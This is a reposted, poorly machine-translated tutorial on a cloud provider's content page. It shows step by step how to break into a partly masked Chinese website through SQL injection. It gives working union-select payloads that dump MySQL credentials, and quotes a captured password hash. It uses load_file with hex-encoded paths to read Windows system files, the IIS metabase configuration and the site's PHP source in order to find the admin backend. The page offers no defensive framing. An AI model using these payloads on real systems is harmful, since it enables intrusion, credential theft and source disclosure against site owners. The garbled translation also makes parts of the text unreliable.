[Go]php mysql inject load_file IIS config file get background address

Source: Internet
Author: User
Tags php mysql

1. Unable to find the backend address, then simply explodeMysqlAdministrator's password
Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat (User,password), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
get the data:Root*cb26b0546cadd30fc2432c095a6a3d54fa3c2ffd

2. Random access to a path, feedback isIIS6of the404the default page, which indicates that the Web server is:Windows+iis6+php+mysqlthe Environment
first putC:\\Boot.iniThis string of paths isHexThe code gets:0x633a5c5c626f6f742e696e69
Then,Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file (0x633A5C5C626F6F742E696E69) , 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
See Echo:

[boot loader] timeout=30 default=multi (0) disk (0) rdisk (0) partition (1) \ Windows [operating systems] multi (0) disk (0) rdisk (0) partition (1) \windows= "WINDOWS Server 2003, Enterprise"/fastdetect/noexecute=optout

Although you canLoad_fileloading files, but it seems to be of little use. No, not also, since it isIIS6, then loadC:\\windows\\system32\\inetsrv\\metabase.xmlThis path will allow you to get the site configuration information.
*Note:Windowsfile operation, the path must be double slash, if it is a single slash, probably willLoad_filefailure to explore its cause, probably because the slash is like this\Top left and right down, andLinuxis the/Top right, lower left. If theWindowsthe path slash followed by aTalso\ tand see what's in programming? If\ nit? \ 'it? Yes, the slash on the path is gone. If it is a double slash,\\that's the real single slash. If you need to output a double slash, then you have to use four slash to indicate, depressed not? \\\\
The last sentence to be injected is:Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file ( 0X633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

Mainly look at these sentence configuration:

<iiswebserver location = "/lm/w3svc/2125961364"

authflags= "0"

logextfileflags= "Logextfiledate | LogExtFileTime | Logextfileclientip | Logextfileuristem | Logextfileuriquery | LogExtFileHttpStatus | Logextfilewin32status | Logextfileserverport | logextfileuseragent | Logextfilehttpsubstatus "

logfiledirectory= "E:\flylog"

Logfilelocaltimerollover= "FALSE"

logfileperiod= "1"

Logfiletruncatesize= "20971520"

Logpluginclsid= "{ff160663-de82-11cf-bc0a-00aa006111e0}"

Serverautostart= "TRUE"

Serverbindings= ": 80:***.com.cn

: 80:www.***.com.cn "

Servercomment= "***.com.cn"

>

</IIsWebServer>

And also:

<iiswebvirtualdir location = "/lm/w3svc/2125961364/root"

accessflags= "AccessRead | AccessWrite | AccessScript "

Appfriendlyname= " default application "

Appisolated= "2"

approot= "/lm/w3svc/2125961364/root"

authflags= "AuthAnonymous | AUTHNTLM "

Defaultdoc= "Yindao.html,index.html,index.php,default.htm,default.asp,index.htm"

dirbrowseflags= "DirBrowseShowDate | Dirbrowseshowtime | Dirbrowseshowsize | dirbrowseshowextension | Dirbrowseshowlongdate | EnableDefaultDoc "

Path= "F:\web\2010716\new_flyer"

Uncpassword= " 49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f74641659a43833 66f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380 "

>

</IIsWebVirtualDir>

here we construct:

Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file ( 0x463a5c5c7765625c5c323031303731365c5c6e65775f666c7965725c5c696e6465782e706870), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
Right-click to view the source code.
*Note:Load_fileWhen you use it, it's best to add one outsideHexnamely:Hex (load_file (xxxxxxx))
because I met a website, the home page does not know where the code is problematic, injecting points on the home page. I use the homepageLoad_filehome file, not nested outsideHex, the homepage is looped, which is something like this:Indexthere's aiframe,iframeLoaded is theIndexthis file,Indexinside this file,iframeLoad AgainIndexThis file goes through the loop until the machine resources are exhausted. Although I don't know if that site was theiframe, but such nesting does have a dead loop occurring, so it is recommendedHexNestingLoad_file
What I'm more concerned aboutIndexinside the code for a place like this:

Require (' admin_flier/common/function.php ');

Require (' admin_flier/lib/class/form.class.php ');

Require (' admin_flier/lib/class/db.class.php ');

Require (' admin_flier/lib/class/page.class.php ');

Include (' inc/head.php ');

Oh, this is not the back office address?

[Go]php mysql inject load_file IIS config file get background address

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.